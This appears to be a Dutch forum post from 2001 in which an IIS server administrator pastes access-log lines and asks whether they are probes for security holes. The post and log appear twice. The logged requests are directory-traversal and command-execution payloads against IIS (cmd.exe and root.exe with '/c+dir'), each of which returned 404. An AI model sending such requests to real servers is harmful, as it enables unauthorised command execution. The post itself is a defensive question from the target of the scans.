Ik ben in de logs van onze IIS webserver vreemde dingen tegegekomen... hier een stukje:
194.128.98.2 - - [12/Oct/2001:04:06:55 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:06:56 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:06:57 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:06:57 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:06:58 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:06:58 +0100] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:06:58 +0100] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:06:59 +0100] "GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:06:59 +0100] "GET /scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:07:01 +0100] "GET /scripts/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:07:02 +0100] "GET /winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:07:03 +0100] "GET /winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:07:03 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:07:04 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:07:04 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:07:08 +0100] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
En dit op een aantal websites en heel frequent vanaf verschillende IP's .. Is dit een soort zoeken naar lekken in de beveiliging??
Fly
194.128.98.2 - - [12/Oct/2001:04:06:55 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:06:56 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:06:57 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:06:57 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:06:58 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:06:58 +0100] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:06:58 +0100] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:06:59 +0100] "GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:06:59 +0100] "GET /scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:07:01 +0100] "GET /scripts/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:07:02 +0100] "GET /winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:07:03 +0100] "GET /winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:07:03 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:07:04 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:07:04 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:07:08 +0100] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
En dit op een aantal websites en heel frequent vanaf verschillende IP's .. Is dit een soort zoeken naar lekken in de beveiliging??
Fly
Zijn er mensen die deze regel lezen? Graag terugkoppeling gewenst (onopvallend)